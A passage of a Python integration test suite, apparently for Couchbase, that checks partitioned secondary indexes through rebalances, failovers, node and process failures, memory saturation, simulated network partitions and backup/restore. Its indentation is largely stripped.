query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(30)
node_out = self.servers[self.node_out]
node_out_str = node_out.ip + ":" + str(node_out.port)
# Get Index Names
index_names = ["idx1"]
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
self.log.info(index_names)
# rebalance out an indexer node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [node_out])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
        # Allow indexer metadata to catch up with the last rebalance
self.sleep(60)
# Get Stats and index partition map after rebalance
node_list = copy.deepcopy(self.node_list)
node_list.remove(node_out_str)
self.log.info(node_list)
index_data_after = {}
total_index_item_count = 0
bucket_item_count = 0
total_partition_count = 0
for index in index_names:
bucket_item_count, total_item_count_after, _ = self.get_stats_for_partitioned_indexes(
index_name=index, node_list=node_list)
self.index_servers = self.get_nodes_from_services_map(
service_type="index", get_all_nodes=True)
index_data_after[index] = {}
index_data_after[index]["item_count"] = total_item_count_after
index_data_after[index][
"index_metadata"] = RestConnection(self.index_servers[0]).get_indexer_metadata()
total_index_item_count += total_item_count_after
total_partition_count += self.get_num_partitions_for_index(
RestConnection(self.index_servers[0]).get_indexer_metadata(), index)
self.assertEqual(total_index_item_count, bucket_item_count,
"Item count in index do not match after cluster ops.")
self.assertEqual(self.num_index_partitions, total_partition_count,
"Some partitions are not available after rebalance")
def test_node_failure_during_rebalance_out_partitioned_indexes(
self):
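        """Fail a node (kill indexer, kill memcached, or reboot) during a
        rebalance-out of an indexer node, rerun the rebalance, and validate
        item counts and partition distribution."""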
        fail_node = self.input.param("fail_node", None)
        if fail_node:
            node_to_fail = self.servers[fail_node]
        else:
            self.fail("fail_node input param is required for this test")
self._load_emp_dataset(end=self.num_items)
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name)"
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(30)
node_out = self.servers[self.node_out]
node_out_str = node_out.ip + ":" + str(node_out.port)
# Get Index Names
index_names = ["idx1"]
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
self.log.info(index_names)
# Get Stats and index partition map before rebalance
index_data_before = {}
for index in index_names:
_, total_item_count_before, _ = self.get_stats_for_partitioned_indexes(
index_name=index)
index_data_before[index] = {}
index_data_before[index]["item_count"] = total_item_count_before
index_data_before[index][
"index_metadata"] = self.rest.get_indexer_metadata()
try:
# rebalance out an indexer node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [node_out])
reached = RestHelper(self.rest).rebalance_reached()
remote_client = RemoteMachineShellConnection(node_to_fail)
if self.node_operation == "kill_indexer":
remote_client.terminate_process(process_name="indexer")
elif self.node_operation == "kill_kv":
remote_client.kill_memcached()
else:
self.reboot_node(node_to_fail)
remote_client.disconnect()
            # wait for restart and warmup on all nodes
self.sleep(self.wait_timeout*2)
# wait till node is ready after warmup
ClusterOperationHelper.wait_for_ns_servers_or_assert([node_to_fail],
self,
wait_if_warmup=True)
rebalance.result()
except Exception as ex:
self.log.info(str(ex))
# Rerun rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [node_out])
self.sleep(30)
reached_rerun = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached_rerun,
"retry of the failed rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
# Get Stats and index partition map after rebalance
node_list = copy.deepcopy(self.node_list)
node_list.remove(node_out_str)
self.log.info(node_list)
index_data_after = {}
for index in index_names:
self.index_servers = self.get_nodes_from_services_map(
service_type="index", get_all_nodes=True)
_, total_item_count_after, _ = self.get_stats_for_partitioned_indexes(
index_name=index, node_list=node_list)
index_data_after[index] = {}
index_data_after[index]["item_count"] = total_item_count_after
index_data_after[index][
"index_metadata"] = RestConnection(self.index_servers[0]).get_indexer_metadata()
self.log.info(index_data_after[index]["index_metadata"])
for index in index_names:
# Validate index item count before and after
self.assertEqual(index_data_before[index]["item_count"],
index_data_after[index]["item_count"],
"Item count in index do not match after cluster ops.")
# Validate host list, partition count and partition distribution
self.assertTrue(
self.validate_partition_distribution_after_cluster_ops(
index, index_data_before[index]["index_metadata"],
index_data_after[index]["index_metadata"], [],
[node_out]),
"Partition distribution post cluster ops has some issues")
def test_node_failure_during_rebalance_in_partitioned_indexes(
self):
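        """Fail a node (kill indexer, kill memcached, or reboot) during a
        rebalance-in of an indexer node, rerun the rebalance, and validate
        item counts and partition distribution."""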
        fail_node = self.input.param("fail_node", None)
        if fail_node:
            node_to_fail = self.servers[fail_node]
        else:
            self.fail("fail_node input param is required for this test")
self._load_emp_dataset(end=self.num_items)
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name)"
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(30)
node_in = self.servers[self.nodes_init]
node_in_str = node_in.ip + ":" + str(node_in.port)
services_in = ["index"]
# Get Index Names
index_names = ["idx1"]
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
self.log.info(index_names)
# Get Stats and index partition map before rebalance
index_data_before = {}
for index in index_names:
_, total_item_count_before, _ = self.get_stats_for_partitioned_indexes(
index_name=index)
index_data_before[index] = {}
index_data_before[index]["item_count"] = total_item_count_before
index_data_before[index][
"index_metadata"] = self.rest.get_indexer_metadata()
# rebalance in an indexer node
try:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[node_in], [],
services=services_in)
reached = RestHelper(self.rest).rebalance_reached()
remote_client = RemoteMachineShellConnection(node_to_fail)
if self.node_operation == "kill_indexer":
remote_client.terminate_process(process_name="indexer")
elif self.node_operation == "kill_kv":
remote_client.kill_memcached()
else:
self.reboot_node(node_to_fail)
remote_client.disconnect()
            # wait for restart and warmup on all nodes
self.sleep(self.wait_timeout)
# wait till node is ready after warmup
ClusterOperationHelper.wait_for_ns_servers_or_assert([node_to_fail],
self,
wait_if_warmup=True)
rebalance.result()
except Exception as ex:
self.log.info(str(ex))
# Rerun Rebalance
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [])
self.sleep(30)
reached_rerun = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached_rerun, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(10)
# Get Stats and index partition map after rebalance
node_list = copy.deepcopy(self.node_list)
node_list.append(node_in_str)
self.log.info(node_list)
index_data_after = {}
for index in index_names:
self.index_servers = self.get_nodes_from_services_map(
service_type="index", get_all_nodes=True)
_, total_item_count_after, _ = self.get_stats_for_partitioned_indexes(
index_name=index, node_list=node_list)
index_data_after[index] = {}
index_data_after[index]["item_count"] = total_item_count_after
index_data_after[index][
"index_metadata"] = RestConnection(self.index_servers[0]).get_indexer_metadata()
for index in index_names:
# Validate index item count before and after
self.assertEqual(index_data_before[index]["item_count"],
index_data_after[index]["item_count"],
"Item count in index do not match after cluster ops.")
# Validate host list, partition count and partition distribution
self.assertTrue(
self.validate_partition_distribution_after_cluster_ops(
index, index_data_before[index]["index_metadata"],
index_data_after[index]["index_metadata"], [node_in],
[]),
"Partition distribution post cluster ops has some issues")
def test_replica_partition_index_with_excluded_nodes_failover(self):
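        """With a node excluded by the planner, create a replicated partitioned
        index, failover and rebalance out an indexer node, and verify that no
        partitions or items are lost."""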
self._load_emp_dataset(end=self.num_items)
# Setting to exclude a node for planner
self.rest.set_index_planner_settings("excludeNode=in")
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_replica':{0}}}".format(
self.num_index_replicas)
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
self.assertTrue(self.validate_partition_map(index_metadata, "idx1",
self.num_index_replicas,
self.num_index_partitions),
"Partition map validation failed")
# Validate index created and check the hosts on which partitions are hosted.
expected_hosts = self.node_list[1:]
expected_hosts.sort()
index_names = []
index_names.append("idx1")
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
index_validated = 0
for index_name in index_names:
for index in index_metadata["status"]:
if index["name"] == index_name:
self.log.info("Expected Hosts : {0}".format(expected_hosts))
self.log.info("Actual Hosts : {0}".format(index["hosts"]))
self.assertEqual(index["hosts"].sort(), expected_hosts.sort(),
"Planner did not ignore excluded node during index creation for {0}".format(
index_name))
index_validated += 1
self.assertEqual(index_validated, (self.num_index_replicas + 1),
"All index replicas not created")
node_out = self.servers[self.node_out]
node_out_str = node_out.ip + ":" + str(node_out.port)
        # failover and rebalance out an indexer node
failover_task = self.cluster.async_failover(
self.servers[:self.nodes_init],
[node_out],
self.graceful, wait_for_pending=180)
failover_task.result()
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [node_out])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
self.sleep(30)
node_list = copy.deepcopy(self.node_list[1:])
if node_out_str in node_list:
node_list.remove(node_out_str)
self.log.info(node_list)
index_data_after = {}
total_index_item_count = 0
bucket_item_count = 0
total_partition_count = 0
for index in index_names:
self.index_servers = self.get_nodes_from_services_map(
service_type="index", get_all_nodes=True)
bucket_item_count, total_item_count_after, _ = self.get_stats_for_partitioned_indexes(
index_name=index, node_list=node_list)
index_data_after[index] = {}
index_data_after[index]["item_count"] = total_item_count_after
index_data_after[index][
"index_metadata"] = RestConnection(self.index_servers[0]).get_indexer_metadata()
total_index_item_count += total_item_count_after
total_partition_count += self.get_num_partitions_for_index(
self.rest.get_indexer_metadata(), index)
self.assertEqual(total_index_item_count, bucket_item_count,
"Item count in index do not match after cluster ops.")
self.assertEqual(self.num_index_partitions, total_partition_count,
"Some partitions are not available after rebalance")
def test_replica_partition_index_with_excluded_nodes_failover_addback(self):
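        """With a node excluded by the planner, create a replicated partitioned
        index, failover an indexer node and add it back, then re-validate the
        partition map."""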
self._load_emp_dataset(end=self.num_items)
# Setting to exclude a node for planner
self.rest.set_index_planner_settings("excludeNode=in")
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_replica':{0}}}".format(
self.num_index_replicas)
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
self.assertTrue(self.validate_partition_map(index_metadata, "idx1",
self.num_index_replicas,
self.num_index_partitions),
"Partition map validation failed")
# Validate index created and check the hosts on which partitions are hosted.
expected_hosts = self.node_list[1:]
expected_hosts.sort()
index_names = []
index_names.append("idx1")
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
# Need to see if the indexes get created in the first place
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
index_validated = 0
for index_name in index_names:
for index in index_metadata["status"]:
if index["name"] == index_name:
self.log.info("Expected Hosts : {0}".format(expected_hosts))
self.log.info("Actual Hosts : {0}".format(index["hosts"]))
self.assertEqual(index["hosts"], expected_hosts,
"Planner did not ignore excluded node during index creation for {0}".format(
index_name))
index_validated += 1
self.assertEqual(index_validated, (self.num_index_replicas + 1),
"All index replicas not created")
node_out = self.servers[self.node_out]
node_out_str = node_out.ip + ":" + str(node_out.port)
        # failover an indexer node and add it back
nodes_all = self.rest.node_statuses()
for node in nodes_all:
if node.ip == node_out.ip:
break
failover_task = self.cluster.async_failover(
self.servers[:self.nodes_init],
[node_out],
self.graceful, wait_for_pending=180)
failover_task.result()
self.rest.set_recovery_type(node.id, self.recovery_type)
self.rest.add_back_node(node.id)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata :::")
self.log.info(index_metadata)
self.assertTrue(self.validate_partition_map(index_metadata, "idx1",
self.num_index_replicas,
self.num_index_partitions),
"Partition map validation failed")
def test_partition_placement_one_node_in_paused_state(self):
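        """Drive one indexer node into the paused state, rebalance in a new
        index node, then create a partitioned index and verify the planner
        places its partitions only on the non-paused indexer nodes."""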
index_server = self.index_servers[0]
create_index_query1 = "CREATE PRIMARY INDEX ON default USING GSI"
create_index_query2 = "CREATE INDEX idx_job_title ON default(job_title) USING GSI"
create_index_query3 = "CREATE INDEX idx_join_yr ON default(join_yr) USING GSI"
create_index_query4 = "CREATE INDEX idx_job_title_join_yr ON default(job_title,join_yr) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query1,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query3,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query4,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
self.rest.set_service_memoryQuota(service='indexMemoryQuota',
memoryQuota=256)
# Ensure indexer reaches to paused state
self._saturate_indexer_memory(index_server)
services_in = ["index"]
# rebalance in a node
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[self.servers[
self.nodes_init]], [],
services=services_in)
rebalance.result()
create_index_query = "CREATE INDEX pidx1 ON default(name,mutated) partition by hash(BASE64(meta().id)) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
index_details = {}
index_details["index_name"] = "pidx1"
index_details["num_partitions"] = self.num_index_partitions
index_details["defer_build"] = False
self.assertTrue(
self.validate_partitioned_indexes(index_details, index_map,
index_metadata),
"Partitioned index created not as expected")
index_node_list = self.node_list
index_node_list.append(
self.servers[self.nodes_init].ip + ":" + self.servers[
self.nodes_init].port)
index_node_list.remove(index_server.ip + ":" + index_server.port)
index_node_list.sort()
validated = False
for index in index_metadata["status"]:
if index["name"] == "pidx1":
self.log.info("Expected Hosts : {0}".format(index_node_list))
self.log.info("Actual Hosts : {0}".format(index["hosts"]))
self.assertEqual(index["hosts"], index_node_list,
"Planner did not exclude node in Paused state during index creation")
validated = True
if not validated:
self.fail("Looks like index was not created.")
def test_index_scans_one_node_memory_saturated(self):
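        """Run the same scan against a partitioned index before and after one
        indexer node is memory-saturated into the paused state and record the
        result counts."""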
index_server = self.index_servers[0]
index_server_str = index_server.ip + ":" + index_server.port
create_index_query1 = "CREATE PRIMARY INDEX ON default USING GSI with {{'nodes':['{0}']}}".format(
index_server_str)
create_index_query2 = "CREATE INDEX idx_job_title ON default(job_title) USING GSI with {{'nodes':['{0}']}}".format(
index_server_str)
create_index_query3 = "CREATE INDEX idx_join_yr ON default(join_yr) USING GSI with {{'nodes':['{0}']}}".format(
index_server_str)
create_index_query4 = "CREATE INDEX idx_job_title_join_yr ON default(job_title,join_yr) USING GSI with {{'nodes':['{0}']}}".format(
index_server_str)
create_index_query5 = "CREATE INDEX pidx1 ON default(name,mutated) partition by hash(BASE64(meta().id)) USING GSI"
try:
self.n1ql_helper.run_cbq_query(query=create_index_query1,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query2,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query3,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query4,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(query=create_index_query5,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
query = "select name,mutated from default where name is not null order by name limit 1000"
results = self.n1ql_helper.run_cbq_query(query=query,
server=self.n1ql_node)
self.assertIsNotNone(results["results"], "No results")
num_results_before = results["metrics"]["resultCount"]
self.log.info("num_results_before : {0}".format(num_results_before))
self.rest.set_service_memoryQuota(service='indexMemoryQuota',
memoryQuota=256)
# Ensure indexer reaches to paused state
self._saturate_indexer_memory(index_server)
query = "select name,mutated from default where name is not null order by name limit 1000"
results = self.n1ql_helper.run_cbq_query(query=query,
server=self.n1ql_node)
self.assertIsNotNone(results["results"], "No results")
num_results_after = results["metrics"]["resultCount"]
self.log.info("num_results_after : {0}".format(str(num_results_after)))
def test_rebalance_out_concurrent_querying_one_node_nw_partitioned(self):
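        """Rebalance out an indexer node while another node is network
        partitioned and queries are running, then validate index item counts
        and partition distribution."""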
self._load_emp_dataset(end=self.num_items)
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(
query=create_primary_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(30)
# Get Index Names
index_names = ["idx1", "pidx1"]
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
index_names.append("pidx1 (replica {0})".format(str(i)))
self.log.info(index_names)
# Get Stats and index partition map before rebalance
index_data_before = {}
for index in index_names:
_, total_item_count_before, _ = self.get_stats_for_partitioned_indexes(
index_name=index)
index_data_before[index] = {}
index_data_before[index]["item_count"] = total_item_count_before
index_data_before[index][
"index_metadata"] = self.rest.get_indexer_metadata()
node_out = self.servers[self.node_out]
node_out_str = node_out.ip + ":" + str(node_out.port)
node_nw_partition_out = self.servers[self.node_out - 1]
self.start_firewall_on_node(node_nw_partition_out)
# start querying
query = "select name,dept,salary from default where name is not missing and dept='HR' and salary > 120000;"
t1 = Thread(target=self._run_queries, args=(query, 30,))
t1.start()
        # rebalance out an indexer node when querying is in progress
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [node_out])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
t1.join()
self.sleep(30)
self.stop_firewall_on_node(node_nw_partition_out)
# Get Stats and index partition map after rebalance
node_list = copy.deepcopy(self.node_list)
node_list.remove(node_out_str)
self.log.info(node_list)
index_data_after = {}
for index in index_names:
_, total_item_count_after, _ = self.get_stats_for_partitioned_indexes(
index_name=index, node_list=node_list)
index_data_after[index] = {}
index_data_after[index]["item_count"] = total_item_count_after
index_data_after[index][
"index_metadata"] = self.rest.get_indexer_metadata()
for index in index_names:
# Validate index item count before and after
self.assertEqual(index_data_before[index]["item_count"],
index_data_after[index]["item_count"],
"Item count in index do not match after cluster ops.")
# Validate host list, partition count and partition distribution
self.assertTrue(
self.validate_partition_distribution_after_cluster_ops(
index, index_data_before[index]["index_metadata"],
index_data_after[index]["index_metadata"], [],
[node_out]),
"Partition distribution post cluster ops has some issues")
def test_rebalance_out_concurrent_querying_server_group_nw_partitioned(
self):
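        """Rebalance out an indexer node while an entire server group is
        network partitioned and queries are running, then validate index item
        counts and partition distribution."""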
self._load_emp_dataset(end=self.num_items)
self._create_server_groups()
# Create partitioned index
create_index_statement = "CREATE INDEX idx1 on default(name,dept,salary) partition by hash(name) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
create_primary_index_statement = "CREATE PRIMARY INDEX pidx1 on default partition by hash(meta().id) with {{'num_replica':{0}, 'num_partition':{1}}}".format(
self.num_index_replicas, self.num_index_partitions)
try:
self.n1ql_helper.run_cbq_query(
query=create_index_statement,
server=self.n1ql_node)
self.n1ql_helper.run_cbq_query(
query=create_primary_index_statement,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.sleep(30)
# Get Index Names
index_names = ["idx1", "pidx1"]
if self.num_index_replicas > 0:
for i in range(1, self.num_index_replicas + 1):
index_names.append("idx1 (replica {0})".format(str(i)))
index_names.append("pidx1 (replica {0})".format(str(i)))
self.log.info(index_names)
# Get Stats and index partition map before rebalance
index_data_before = {}
for index in index_names:
_, total_item_count_before, _ = self.get_stats_for_partitioned_indexes(
index_name=index)
index_data_before[index] = {}
index_data_before[index]["item_count"] = total_item_count_before
index_data_before[index][
"index_metadata"] = self.rest.get_indexer_metadata()
node_out = self.servers[self.node_out]
node_out_str = node_out.ip + ":" + str(node_out.port)
# Network partition out Server Group
server_group_out = self.input.param("server_group_out", None)
server_group_nodes = []
if server_group_out:
server_group_nodes = server_group_out.split(":")
for node in server_group_nodes:
self.start_firewall_on_node(node)
# start querying
query = "select name,dept,salary from default where name is not missing and dept='HR' and salary > 120000;"
t1 = Thread(target=self._run_queries, args=(query, 30,))
t1.start()
        # rebalance out an indexer node when querying is in progress
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[], [node_out])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached, "rebalance failed, stuck or did not complete")
rebalance.result()
t1.join()
self.sleep(30)
if server_group_nodes:
for node in server_group_nodes:
self.stop_firewall_on_node(node)
# Get Stats and index partition map after rebalance
node_list = copy.deepcopy(self.node_list)
node_list.remove(node_out_str)
self.log.info(node_list)
index_data_after = {}
for index in index_names:
_, total_item_count_after, _ = self.get_stats_for_partitioned_indexes(
index_name=index, node_list=node_list)
index_data_after[index] = {}
index_data_after[index]["item_count"] = total_item_count_after
index_data_after[index][
"index_metadata"] = self.rest.get_indexer_metadata()
for index in index_names:
# Validate index item count before and after
self.assertEqual(index_data_before[index]["item_count"],
index_data_after[index]["item_count"],
"Item count in index do not match after cluster ops.")
# Validate host list, partition count and partition distribution
self.assertTrue(
self.validate_partition_distribution_after_cluster_ops(
index, index_data_before[index]["index_metadata"],
index_data_after[index]["index_metadata"], [],
[node_out]),
"Partition distribution post cluster ops has some issues")
def test_partitioned_index_recoverability(self):
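        """Kill the indexer process and verify that a partitioned index
        recovers and returns the same number of rows as before the crash."""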
node_out = self.servers[self.node_out]
create_index_query = "CREATE INDEX idx1 ON default(name,mutated) partition by hash(meta().id) USING GSI"
if self.num_index_replicas:
create_index_query += " with {{'num_replica':{0}}};".format(
self.num_index_replicas)
try:
self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail(
"index creation failed with error : {0}".format(str(ex)))
# Allow index to be built completely
self.sleep(30)
# Run query
scan_query = "select name,mutated from default where name > 'a' and mutated >=0;"
try:
result_before = self.n1ql_helper.run_cbq_query(query=scan_query, min_output_size=10000000,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("Scan failed")
# Kill indexer and allow it to recover and rebuild index
remote = RemoteMachineShellConnection(node_out)
remote.terminate_process(process_name="indexer")
self.sleep(30, "Sleep after killing indexer")
# Run same query again and check if results match from before recovery
scan_query = "select name,mutated from default where name > 'a' and mutated >=0;"
try:
result_after = self.n1ql_helper.run_cbq_query(query=scan_query, min_output_size=10000000,
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("Scan failed")
# Validate if the same count of docs are returned after recovery
self.assertEqual(result_before["metrics"]["resultCount"], result_after["metrics"]["resultCount"], "No. of rows returned before recovery and after recovery are different")
def test_backup_restore_partitioned_index(self):
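        """Back up a bucket with several partitioned indexes, drop and recreate
        the bucket, restore the backup, and verify the index definitions are
        restored (in an unbuilt state)."""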
self._load_emp_dataset(end=self.num_items)
index_details = []
index_detail = {}
index_detail["index_name"] = "idx1"
index_detail["num_partitions"] = self.num_index_partitions
index_detail["defer_build"] = False
index_detail[
"definition"] = "CREATE INDEX idx1 on default(name,dept) partition by hash(salary) USING GSI"
index_details.append(index_detail)
index_detail = {}
index_detail["index_name"] = "idx2"
index_detail["num_partitions"] = 64
index_detail["defer_build"] = False
index_detail[
"definition"] = "CREATE INDEX idx2 on default(name,dept) partition by hash(salary) USING GSI with {'num_partition':64}"
index_details.append(index_detail)
index_detail = {}
index_detail["index_name"] = "idx3"
index_detail["num_partitions"] = self.num_index_partitions
index_detail["defer_build"] = False
index_detail[
"definition"] = "CREATE INDEX idx3 on default(name,dept) partition by hash(salary) USING GSI with {'num_replica':1}"
index_details.append(index_detail)
index_detail = {}
index_detail["index_name"] = "idx4"
index_detail["num_partitions"] = self.num_index_partitions
index_detail["defer_build"] = True
index_detail[
"definition"] = "CREATE INDEX idx4 on default(name,dept) partition by hash(salary) USING GSI with {'defer_build':true}"
index_details.append(index_detail)
index_detail = {}
try:
for index in index_details:
self.n1ql_helper.run_cbq_query(query=index["definition"],
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
for index_detail in index_details:
self.assertTrue(
self.validate_partitioned_indexes(index_detail, index_map,
index_metadata),
"Partitioned index created not as expected")
kv_node = self.get_nodes_from_services_map(service_type="kv",
get_all_nodes=False)
self._create_backup(kv_node)
# Drop and recreate bucket
self.cluster.bucket_delete(kv_node, bucket="default")
default_params = self._create_bucket_params(server=self.master,
size=self.bucket_size,
replicas=self.num_replicas)
self.cluster.create_default_bucket(default_params)
if self.node_out > 0:
node_out = self.servers[self.node_out]
rebalance = self.cluster.async_rebalance(
self.servers[:self.nodes_init],
[], [node_out])
reached = RestHelper(self.rest).rebalance_reached()
self.assertTrue(reached,
"rebalance failed, stuck or did not complete")
rebalance.result()
# Restore backup
self._create_restore(kv_node)
self.sleep(60)
# Validate all indexes restored correctly
index_map = self.get_index_map()
self.log.info(index_map)
if self.node_out > 0:
if self.node_out == self.index_servers[0]:
rest = RestConnection(self.index_servers[1])
else:
rest = self.rest
else:
rest = self.rest
index_metadata = rest.get_indexer_metadata()
self.log.info("Indexer Metadata After Build:")
self.log.info(index_metadata)
# After restore, all indexes are expected to be unbuilt, so change the expected state of the indexes.
for index in index_details:
index["defer_build"] = True
for index_detail in index_details:
self.assertTrue(
self.validate_partitioned_indexes(index_detail, index_map,
index_metadata),
"Partitioned index created not as expected")
def test_backup_partitioned_index_with_failed_node(self):
self._load_emp_dataset(end=self.num_items)
node_out = self.servers[self.node_out]
index_details = []
index_detail = {}
index_detail["index_name"] = "idx1"
index_detail["num_partitions"] = self.num_index_partitions
index_detail["defer_build"] = False
index_detail[
"definition"] = "CREATE INDEX idx1 on default(name,dept) partition by hash(salary) USING GSI"
index_details.append(index_detail)
index_detail = {}
index_detail["index_name"] = "idx2"
index_detail["num_partitions"] = 64
index_detail["defer_build"] = False
index_detail[
"definition"] = "CREATE INDEX idx2 on default(name,dept) partition by hash(salary) USING GSI with {'num_partition':64}"
index_details.append(index_detail)
index_detail = {}
index_detail["index_name"] = "idx3"
index_detail["num_partitions"] = self.num_index_partitions
index_detail["defer_build"] = False
index_detail[
"definition"] = "CREATE INDEX idx3 on default(name,dept) partition by hash(salary) USING GSI with {'num_replica':1}"
index_details.append(index_detail)
index_detail = {}
index_detail["index_name"] = "idx4"
index_detail["num_partitions"] = self.num_index_partitions
index_detail["defer_build"] = True
index_detail[
"definition"] = "CREATE INDEX idx4 on default(name,dept) partition by hash(salary) USING GSI with {'defer_build':true}"
index_details.append(index_detail)
index_detail = {}
try:
for index in index_details:
self.n1ql_helper.run_cbq_query(query=index["definition"],
server=self.n1ql_node)
except Exception as ex:
self.log.info(str(ex))
self.fail("index creation failed with error : {0}".format(str(ex)))
self.sleep(10)
index_map = self.get_index_map()
self.log.info(index_map)
index_metadata = self.rest.get_indexer_metadata()
self.log.info("Indexer Metadata Before Build:")
self.log.info(index_metadata)
for index_detail in index_details:
self.assertTrue(
self.validate_partitioned_indexes(index_detail, index_map,
index_metadata),
"Partitioned index created not as expected")
kv_node = self.get_nodes_from_services_map(service_type="kv",
get_all_nodes=False)
try:
# Stop couchbase on indexer node before taking backup if test config specifies it
remote = RemoteMachineShellConnection(node_out)
remote.stop_couchbase()
self.sleep(30, "Allow node to be marked as a failed node")
self._create_backup(kv_node)
except Exception as ex:
self.log.info(str(ex))
finally:
remote = RemoteMachineShellConnection(node_out)
remote.start_couchbase()
def test_restore_partitioned_index_with_failed_node(self):
self._load_emp_dataset(end=self.num_items)
node_out = self.servers[self.node_out]
index_details = []
index_detail = {}
index_detail["index_name"] = "idx1"
index_detail["num_partitions"] = self.num_index_partitions
index_detail["defer_build"] = False
index_detail[
"definition"] = "CREATE INDEX idx1 on default(name,dept) partition by hash(salary) USING GSI"
index_details.append(index_detail)
index_detail = {}
index_detail["index_name"] = "idx2"
index_detail["num_partitions"] = 64
index_detail["defer_build"] = False
index_detail[
"definition"] = "CREATE INDEX idx2 on default(name,dept) partition by hash(salary) USING GSI with {'num_partition':64}"
